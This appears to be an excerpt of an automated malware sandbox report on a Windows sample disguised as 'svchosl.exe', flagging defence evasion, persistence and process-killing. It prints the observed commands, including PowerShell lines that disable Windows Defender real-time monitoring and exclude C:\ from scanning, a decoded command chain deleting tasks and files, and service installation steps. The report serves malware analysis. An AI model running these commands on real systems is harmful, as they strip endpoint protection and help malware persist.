Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 14_2_00007FF77B32B59C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_00007FF77B32B59C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32AD00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF77B32AD00
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B33A1D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF77B33A1D8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32B740 SetUnhandledExceptionFilter, 16_2_00007FF77B32B740
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF77B32B59C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF77B32B59C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8A87C4FDE __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8A87C4FDE
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B7FE1D66 __scrt_fastfail,IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8B7FE1D66
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B906411C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8B906411C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9064304 SetUnhandledExceptionFilter, 16_2_00007FF8B9064304
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B90636D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8B90636D8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C3594 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8B93C3594
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C27C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8B93C27C4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B93C377C SetUnhandledExceptionFilter, 16_2_00007FF8B93C377C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9843298 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8B9843298
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9843EC4 SetUnhandledExceptionFilter, 16_2_00007FF8B9843EC4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9843CDC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8B9843CDC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F6A92C SetUnhandledExceptionFilter, 16_2_00007FF8B9F6A92C
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F6A744 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8B9F6A744
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8B9F69974 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8B9F69974
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA242EA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8BA242EA8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA2438EC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8BA2438EC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA243AD4 SetUnhandledExceptionFilter, 16_2_00007FF8BA243AD4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA4F6810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8BA4F6810
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA4F5DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8BA4F5DF8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA4F69F8 SetUnhandledExceptionFilter, 16_2_00007FF8BA4F69F8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BA51D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8BA51D414
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAB14A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8BFAB14A8
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAB1EEC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8BFAB1EEC
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAB20D4 SetUnhandledExceptionFilter, 16_2_00007FF8BFAB20D4
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00007FF8BFAD4A34
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Code function: 16_2_00007FF8BFAD5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00007FF8BFAD5054
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds extensions / path to Windows Defender exclusion list
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -ExclusionPath c:\
Disables Windows Defender (via service or powershell)
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Encrypted powershell cmdline option found
Source: C:\Users\mig.exe Process created: Base64 decoded net stop wmservicetaskkill /f /im migrate.exetaskkill /f /im IntelConfigService.exetaskkill /f /im MSTask.exetaskkill /f /im Superfetch.exetaskkill /f /im Wmiic.exetaskkill /f /im Wrap.execmd /c takeown /F "c:\windows\tasks"schtasks /delete /tn "WindowsUpdate" /Fcmd /c takeown /F "C:\ProgramData\migrate.exe"cmd /c del /F /Q "C:\ProgramData\migrate.exe"
Source: C:\Users\mig.exe Process created: Base64 decoded net stop wmservicetaskkill /f /im migrate.exetaskkill /f /im IntelConfigService.exetaskkill /f /im MSTask.exetaskkill /f /im Superfetch.exetaskkill /f /im Wmiic.exetaskkill /f /im Wrap.execmd /c takeown /F "c:\windows\tasks"schtasks /delete /tn "WindowsUpdate" /Fcmd /c takeown /F "C:\ProgramData\migrate.exe"cmd /c del /F /Q "C:\ProgramData\migrate.exe"
Excessive usage of taskkill to terminate processes
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im migrate.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im IntelConfigService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im MSTask.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Superfetch.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wmiic.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /f /im Wrap.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v2.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v3.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im ape_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im full_rdp_modul_v1.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe
Modifies Windows Defender protection settings
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Users\mig.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $True
Contains functionality to launch a program with higher privileges
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Code function: 6_2_000000014000A180 GetProcessHeap,HeapAlloc,GetCommandLineW,_snwprintf_s,ShellExecuteExW,GetProcessHeap,HeapFree, 6_2_000000014000A180
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\123.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\programdata\MicrosoftSystem\run.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe "C:\programdata\MicrosoftSystem\wmiic.exe" install MicrosoftESS svchosl.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 1 /NOBREAK Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\MicrosoftSystem\Wmiic.exe "C:\programdata\MicrosoftSystem\wmiic" start MicrosoftESS Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe TIMEOUT /T 2 /NOBREAK Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\net.exe net start MicrosoftESS Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\ProgramData\MicrosoftSystem\svchosl.exe "svchosl.exe" Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v2.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v3.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im ape_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im full_rdp_modul_v1.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im rdp.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im wrm_modul_v4.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im nl.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im WerFault.exe Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im WerFault.exe Jump to behavior
